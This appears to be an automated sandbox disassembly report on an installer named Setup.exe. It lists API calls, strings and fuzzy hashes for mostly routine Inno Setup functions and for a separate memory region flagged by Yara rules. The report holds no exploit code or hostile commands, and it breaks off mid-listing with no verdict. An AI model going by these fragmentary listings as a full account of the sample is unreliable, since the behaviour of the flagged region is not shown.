Part of subcall function 00466994: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00466A37
Part of subcall function 00466994: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A5D
Part of subcall function 00466994: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466AB4

Part of subcall function 004941B4: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004941BE

Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C

Part of subcall function 00493E80: 73A1A570.USER32(00000000,?,?,?), ref: 00493EA2
Part of subcall function 00493E80: SelectObject.GDI32(?,00000000), ref: 00493EC8
Part of subcall function 00493E80: 73A1A480.USER32(00000000,?,00493F26,00493F1F,?,00000000,?,?,?), ref: 00493F19

Part of subcall function 004941A4: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004941AE

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,00000000,?), ref: 00467C37
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467C48
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467C60

Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082

Strings

(Default), xrefs: 00468249
{H, xrefs: 00466E81, 00466E95
, xrefs: 00467049
STOPIMAGE, xrefs: 00466F7C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Menu$AppendExtractIconObject$A480A570AddressBitmapFileInfoLoadMessageProcRectSelectSendSystemWindow
String ID: $(Default)$STOPIMAGE${H
API String ID: 2685095364-3436354053
Opcode ID: 1de539ae9bedc9ad5bcca39480bc3e6a5945468ef4fae126410cf194d242a330
Instruction ID: a6f197261a18fc9eff18fbfa3c5028089fc26a300eb1d9caf07a23dde61acc02
Opcode Fuzzy Hash: 1de539ae9bedc9ad5bcca39480bc3e6a5945468ef4fae126410cf194d242a330
Instruction Fuzzy Hash: D6F2C6386005148FCB00EB59D5D9F9973F5FF49308F1542BAE5049B36ADB78AC4ACB8A

Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004183A3
GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
GetWindowRect.USER32(?), ref: 004183DC
GetWindowLongA.USER32(?,000000F0), ref: 004183EA
GetWindowLongA.USER32(?,000000F8), ref: 004183FF
ScreenToClient.USER32(00000000), ref: 00418408
ScreenToClient.USER32(00000000,?), ref: 00418413

Strings

,, xrefs: 004183AC

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9

Function 02FD925E Relevance: 13.3, Strings: 10, Instructions: 810COMMON

Download Yara Rule

Strings

M!@#, xrefs: 02FD97A4
Dx, xrefs: 02FD93BF
7v.H, xrefs: 02FD9698
(), xrefs: 02FD97B4
1-lw, xrefs: 02FD9B64
9]^_, xrefs: 02FD935F
Empty, xrefs: 02FD926D
A%T', xrefs: 02FD97AC
0j6l, xrefs: 02FD954D
MN, xrefs: 02FD96A8

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ()$0j6l$1-lw$7v.H$9]^_$A%T'$Dx$Empty$M!@#$MN
API String ID: 0-1661773770
Opcode ID: 5b0d466be798e24605a6af6c7ce68708b1d9dc5b9487d3eed71802447ca16526
Instruction ID: fdea19d3a44f64bea2b2f5e1bec2a4383ed61afa24e764241208dbcd0555e882
Opcode Fuzzy Hash: 5b0d466be798e24605a6af6c7ce68708b1d9dc5b9487d3eed71802447ca16526
Instruction Fuzzy Hash: B4420272A483508FD310CFA5C88179BBBE2EFC5350F19892DEAD59B291D7B4D805CB92

Function 02FC1E0E Relevance: 13.0, Strings: 10, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 02FC1F8D
I@, xrefs: 02FC1F9D
P^, xrefs: 02FC1F95
M, xrefs: 02FC1EE3
G8, xrefs: 02FC21A6
OX, xrefs: 02FC1F85
HJ, xrefs: 02FC2186
rI, xrefs: 02FC1EDB
(=A, xrefs: 02FC201E
"E, xrefs: 02FC1ED3

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: C$ (=A$"E$G8$I@$M$OX$P^$rI$HJ
API String ID: 0-520677845
Opcode ID: bb475866ebc9d7f41a57e64a8e4122fe320fcb3f9d58f9c299b73c88b97810ff
Instruction ID: f94ffdc62dec8905f08689cafe927c52f7e7e550479f5eea728f7a9a5c6d47f5
Opcode Fuzzy Hash: bb475866ebc9d7f41a57e64a8e4122fe320fcb3f9d58f9c299b73c88b97810ff
Instruction Fuzzy Hash: 23D113B1A083118BD320DF24C9917A7B7F1FFC1754F18952CEA858B395E7799904CB92

Function 00454B10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00454B1F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B25
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B3E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B65
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B6A
ExitWindowsEx.USER32(00000002,00000000), ref: 00454B7B

Strings

SeShutdownPrivilege, xrefs: 00454B37

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: d3d6a5395fdd0b55af1cbd6e85fcb70604769190e38f0b26fe262d4f46a0da47
Instruction ID: 71a91aff67a88180f283013a3394e07777ed446edd0ea8bbca610d6ac1ec1ab7
Opcode Fuzzy Hash: d3d6a5395fdd0b55af1cbd6e85fcb70604769190e38f0b26fe262d4f46a0da47
Instruction Fuzzy Hash: 76F06270684302B5E610EA758C07F2B219C9B80B5DF50092ABE45EE1C3D7BCE44C4A2A

Function 0047F1BC Relevance: 10.6, Strings: 8, Instructions: 603COMMON

Download Yara Rule

Strings

NameAndVersion, xrefs: 0047F543
InitializeSetup, xrefs: 0047F49D
InitializeSetup returned False; aborting., xrefs: 0047F4D5
CheckSerial, xrefs: 0047F43D
Windows NT, xrefs: 0047F258, 0047F276, 0047F29A, 0047F2D4
Windows, xrefs: 0047F2B0, 0047F2EA
CheckPassword, xrefs: 0047F411
%1 %2, xrefs: 0047F554

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A259ClassInfoMessageSend
String ID: %1 %2$CheckPassword$CheckSerial$InitializeSetup$InitializeSetup returned False; aborting.$NameAndVersion$Windows$Windows NT
API String ID: 3217714596-1058987359
Opcode ID: a9c955355e6de36fecfbe35d1c5fc6899357549affa4d2556bfbca316394ae2c
Instruction ID: f0f01dba550dfb782fbbdb3e8a11e5aad7a5db07204eff3286ab11f46639dcf9
Opcode Fuzzy Hash: a9c955355e6de36fecfbe35d1c5fc6899357549affa4d2556bfbca316394ae2c
Instruction Fuzzy Hash: CF425C74604244CFCB20EF65E985B9A77B1EB55308F50C0BBE8489B362DB389D49CB9D

Function 0049676C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000,00496A88,?,?,00000000,0049A628), ref: 004967C3
SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496846
FindNextFileA.KERNEL32(000000FF,?,00000000,00496882,?,00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000), ref: 0049685E
FindClose.KERNEL32(000000FF,00496889,00496882,?,00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000,00496A88), ref: 0049687C

Strings

isRS-???.tmp, xrefs: 004967AD
isRS-, xrefs: 004967E3

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 4fb7fc73cbbc2ebdf229efa0d7a51f6f571d1ea018a9185c69f8735562a7e009
Instruction ID: 4c3790275d38ca103fc9de384e2170f2b3829de03e7269e11a2e0ee89d27f860
Opcode Fuzzy Hash: 4fb7fc73cbbc2ebdf229efa0d7a51f6f571d1ea018a9185c69f8735562a7e009
Instruction Fuzzy Hash: C331A671901618AFDF10FF65CC41ACEBBBCDB45304F5184FBA808A32A1E6389F458E58

Function 0044C030 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060

Strings

oleacc.dll, xrefs: 0044C03A
LresultFromObject, xrefs: 0044C04A
CreateStdAccessibleObject, xrefs: 0044C05A

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 2238633743-1050967733
Opcode ID: 411b1b9156d41faf7b0d8604684554040c0d835a05aed1093dc6f60d7a1b198d
Instruction ID: 6897363f1710112a1cfdb6ee47a14c611c94d7941e22141d9df1cf6d82904717
Opcode Fuzzy Hash: 411b1b9156d41faf7b0d8604684554040c0d835a05aed1093dc6f60d7a1b198d
Instruction Fuzzy Hash: DFF01C70242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E

Function 02FABEEE Relevance: 10.4, Strings: 8, Instructions: 372COMMON

Download Yara Rule

Strings

gb(+, xrefs: 02FAC221
9'gs, xrefs: 02FAC219
;<, xrefs: 02FAC0A4
G$@&, xrefs: 02FAC026
zlbz, xrefs: 02FAC229
CXdZ, xrefs: 02FAC02E
a\]^, xrefs: 02FAC036
n`of, xrefs: 02FAC28C

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 9'gs$;<$CXdZ$G$@&$a\]^$gb(+$n`of$zlbz
API String ID: 0-2826994576
Opcode ID: 9f7e32384494664d002377d0c57d64a336b3b2fee8dd28d46c40dbd19b06813b
Instruction ID: 93a4805bfcf303f128d3690a43edb22f2d4e7980c1ffdabfdb38bd0f8cb38414
Opcode Fuzzy Hash: 9f7e32384494664d002377d0c57d64a336b3b2fee8dd28d46c40dbd19b06813b
Instruction Fuzzy Hash: CCC16BB2A0C3814FD328CF65946126BFBE2AFD2744F1C892DDAE54B345D77588098B86

Function 02FD89DE Relevance: 10.2, Strings: 8, Instructions: 237COMMON

Download Yara Rule

Strings

b, xrefs: 02FD8B60
v, xrefs: 02FD8B5B
V, xrefs: 02FD89FC
X, xrefs: 02FD8B65
1, xrefs: 02FD8C8B
;, xrefs: 02FD8C86
^H;:, xrefs: 02FD8ADC
V, xrefs: 02FD8A36

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 1$;$V$V$X$^H;:$b$v
API String ID: 0-2907149787
Opcode ID: dbf0d9b4ec23f45d1366adf25fe18ba94378fd68c85170d4084cc0883f3b8c0a
Instruction ID: 48588bd39fc9a572bd7a47d7e930395b47283b696511d09829eb437646d3010e
Opcode Fuzzy Hash: dbf0d9b4ec23f45d1366adf25fe18ba94378fd68c85170d4084cc0883f3b8c0a
Instruction Fuzzy Hash: EB81D02260D7D18AD3118A78488425BAFD35BE21B4F5CCFACE5F5873C6D666C90B8363

Function 00431740 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 498libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000), ref: 004318AE

Strings

ualA, xrefs: 00431D78
ublA, xrefs: 00431ACB
Uirt, xrefs: 00431C8E
Virt, xrefs: 004317E1

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc
String ID: Uirt$Virt$ualA$ublA
API String ID: 190572456-1341275870
Opcode ID: 2d572804610bc5500bf745c23e3ecc1f5f00c2e3a3784a4e21215673bb0f8295
Instruction ID: cf4910098fee31f0823e1f010c0b44363684d6c60b92b14fa7dbdbb73bbc7777
Opcode Fuzzy Hash: 2d572804610bc5500bf745c23e3ecc1f5f00c2e3a3784a4e21215673bb0f8295
Instruction Fuzzy Hash: F2F1FF339143208FD758EFBEEC9655A37A2F7A4319342823FD81297566DF381D428A8D

Function 02FBA962 Relevance: 9.1, Strings: 7, Instructions: 324COMMON

Download Yara Rule

Strings

]X, xrefs: 02FBADA4
!#, xrefs: 02FBACDE
WQ, xrefs: 02FBAD8E
)+, xrefs: 02FBACF4
8%, xrefs: 02FBAD99
^K, xrefs: 02FBADAF
%', xrefs: 02FBACE9

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 8%$WQ$]X$^K$!#$%'$)+
API String ID: 0-422034314
Opcode ID: 8583753771f21913630e4b16565f6d31a2c3bd4954b8a1b108354afb20de2ac5
Instruction ID: 6a457de7102271c057694d1f3739c097743021db39a9ca2913987f1f7fb4b83d
Opcode Fuzzy Hash: 8583753771f21913630e4b16565f6d31a2c3bd4954b8a1b108354afb20de2ac5
Instruction Fuzzy Hash: BAD132B184A7918BD3318F2198813DBBBE2BFE6340F118A2CC9DD5B714EB758545CB82

Function 0045688C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456909
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456930
SetForegroundWindow.USER32(?), ref: 00456941
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456C19,?,00000000,00456C55), ref: 00456C04

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456A84

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: 31fefba10e387b8797fee33cad726d103b0f34a8165469033a2043f595a757f5
Instruction ID: 10654f18c5d002830b012396f94dace0bb6b4eb939fefcd194574106bfd79093
Opcode Fuzzy Hash: 31fefba10e387b8797fee33cad726d103b0f34a8165469033a2043f595a757f5
Instruction Fuzzy Hash: 6791FE74204204EFD716CF55C961F5ABBF9FB89305F6280BAEC0497392C639AE14CB59

Function 00455338 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455477), ref: 00455368
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045536E

Strings

GetDiskFreeSpaceExA, xrefs: 0045535E
kernel32.dll, xrefs: 00455363

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 16ad348cb9d1cd96fae5bec6cb0077d75dfc677498ca93837c300ec8fe8ebd68
Instruction ID: dabfbf279b89037e1462e9a882b6d795e79896abcd5759e9fca5673e80196c90
Opcode Fuzzy Hash: 16ad348cb9d1cd96fae5bec6cb0077d75dfc677498ca93837c300ec8fe8ebd68
Instruction Fuzzy Hash: 69419371A00649AFCF01EFA5C892AEFB7B8EF49305F508566F804F7252D67C5D098B68

Function 00474078 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004740D1
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004741AE
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004741BC

Strings

unins, xrefs: 00474124
unins???.*, xrefs: 004740BB

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: e8c8ff6306689ed672afa0baad29320733a4d4b22a4d82b6925294196a0c3292
Instruction ID: b9c1e050b5ed1d52b1e0efb42f65b2bb765eda7093c4a0c3f8d8c725b59b8066
Opcode Fuzzy Hash: e8c8ff6306689ed672afa0baad29320733a4d4b22a4d82b6925294196a0c3292
Instruction Fuzzy Hash: 2A3152746001089BDB10EB65CD85AEE77B9DF84304F5085F6A44CAB2A2DB39DF858B58

Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Strings

,, xrefs: 00417D61

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: ee8a28a784f717aad114cf7761ff202b5f9973c8693922c7421ed2f673d62dc0
Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
Opcode Fuzzy Hash: ee8a28a784f717aad114cf7761ff202b5f9973c8693922c7421ed2f673d62dc0
Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68

Function 02FAAA4E Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

i, xrefs: 02FAAD3A
kXSD, xrefs: 02FAAC90
~@q}, xrefs: 02FAAB05
}~, xrefs: 02FAAF35
<, xrefs: 02FAACA0
KX]^, xrefs: 02FAAC98

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: <$KX]^$i$kXSD$}~$~@q}
API String ID: 0-634742463
Opcode ID: 40f71f00527f6e889b0c774a7d401f4e066d9385d28f1f8afaa8d3afd01ab655
Instruction ID: 28e75f6a4b5c0072511ab8a95656a610f4ea4c1c46ea1693ecb40c771d69f486
Opcode Fuzzy Hash: 40f71f00527f6e889b0c774a7d401f4e066d9385d28f1f8afaa8d3afd01ab655
Instruction Fuzzy Hash: B2E168B294C3548BC324DF68CC9176BBBE2EBC1214F19897DE5E58B390DB3589098B46

Function 02FAA33E Relevance: 7.8, Strings: 6, Instructions: 315COMMON

Download Yara Rule

Strings

53, xrefs: 02FAA357
VM_U, xrefs: 02FAA42F
mqoh, xrefs: 02FAA447
sqmp, xrefs: 02FAA43F
:, xrefs: 02FAA35E
tpfr, xrefs: 02FAA45F

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 53$:$VM_U$mqoh$sqmp$tpfr
API String ID: 0-2138070392
Opcode ID: 1b6664af7c86144a3a54590cf0e283a340205974ec49d180384c121aab9cc47b
Instruction ID: 8901bac0232145642e4b506823279dff8e009cdc4269b7a083bb85f3e1148167
Opcode Fuzzy Hash: 1b6664af7c86144a3a54590cf0e283a340205974ec49d180384c121aab9cc47b
Instruction Fuzzy Hash: 038137716483828ED715CF2984A13AAFFE29FD2288F1885ADD4D19B346D739C50EC726

Function 00463504 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,004636C1), ref: 00463535
FindFirstFileA.KERNEL32(00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 004635C4
FindNextFileA.KERNEL32(000000FF,?,00000000,00463676,?,00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 00463656
FindClose.KERNEL32(000000FF,0046367D,00463676,?,00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 00463670

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: 193e4c53942d83c8cd64099dc49e453f1a45c9b3e892fecb9f772a5202518c7f
Instruction ID: b0d7957544a47795154538d81e468f7c6c920a748ffd929e2f02ef98002ad070
Opcode Fuzzy Hash: 193e4c53942d83c8cd64099dc49e453f1a45c9b3e892fecb9f772a5202518c7f
Instruction Fuzzy Hash: BF418770A00A58AFCB11EF65CC55ADEB7B8EB48709F4044BAF404A7391E77C9F448E59

Function 00463980 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,00463B67), ref: 004639F5
